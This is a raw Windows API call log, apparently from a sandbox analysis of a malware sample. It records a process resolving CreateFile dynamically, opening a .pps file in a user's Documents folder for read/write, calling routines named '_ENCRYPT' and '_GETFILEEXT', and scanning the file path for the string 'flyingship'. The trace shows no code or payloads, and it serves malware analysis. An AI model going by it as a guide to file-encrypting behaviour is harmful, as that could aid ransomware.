[0179.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0179.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0179.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0179.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0179.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0179.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0179.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0179.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0179.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0179.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0179.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0179.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0179.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0179.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0179.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0179.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0179.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0179.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0179.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0179.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0179.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0179.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0179.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0179.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0179.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0179.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0179.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0179.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0179.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0179.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0179.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0179.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0179.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0179.446] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0179.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0179.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0179.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0179.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd480 [0179.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd480, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0179.448] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\orhlgisqmqrnaihm\\vupb0.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0179.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0179.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0179.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0179.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0179.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0179.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0179.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0179.450] FreeLibrary (hLibModule=0x75990000) returned 1 [0179.450] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0179.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0179.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0179.450] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0179.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0179.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0179.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0179.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0179.450] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0179.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0179.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0179.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0179.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0179.451] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0179.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0179.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0179.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0179.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4e0 [0179.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd4e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0179.452] FreeLibrary (hLibModule=0x75990000) returned 1 [0179.452] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0179.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0179.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0179.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0179.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0179.452] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0179.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0179.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0179.452] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0179.452] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0179.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0179.452] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0179.452] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0179.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pps", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0179.453] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.453] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.453] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.453] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c95c9b0, ftCreationTime.dwHighDateTime=0x1d5e3d7, ftLastAccessTime.dwLowDateTime=0xd9387fe0, ftLastAccessTime.dwHighDateTime=0x1d5e756, ftLastWriteTime.dwLowDateTime=0xd9387fe0, ftLastWriteTime.dwHighDateTime=0x1d5e756, nFileSizeHigh=0x0, nFileSizeLow=0x137f5, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="vupb0.pps", cAlternateFileName="")) returned 0x90add8 [0179.454] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0179.455] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.455] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c95c9b0, ftCreationTime.dwHighDateTime=0x1d5e3d7, ftLastAccessTime.dwLowDateTime=0xd9387fe0, ftLastAccessTime.dwHighDateTime=0x1d5e756, ftLastWriteTime.dwLowDateTime=0xd9387fe0, ftLastWriteTime.dwHighDateTime=0x1d5e756, nFileSizeHigh=0x0, nFileSizeLow=0x137f5, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="vupb0.pps", cAlternateFileName="")) returned 0x90add8 [0179.455] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0179.455] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Bxf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xf\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="orhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rhLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hLGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LGiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GiSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iSQMqRNAIhM\\vupb0.pps\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 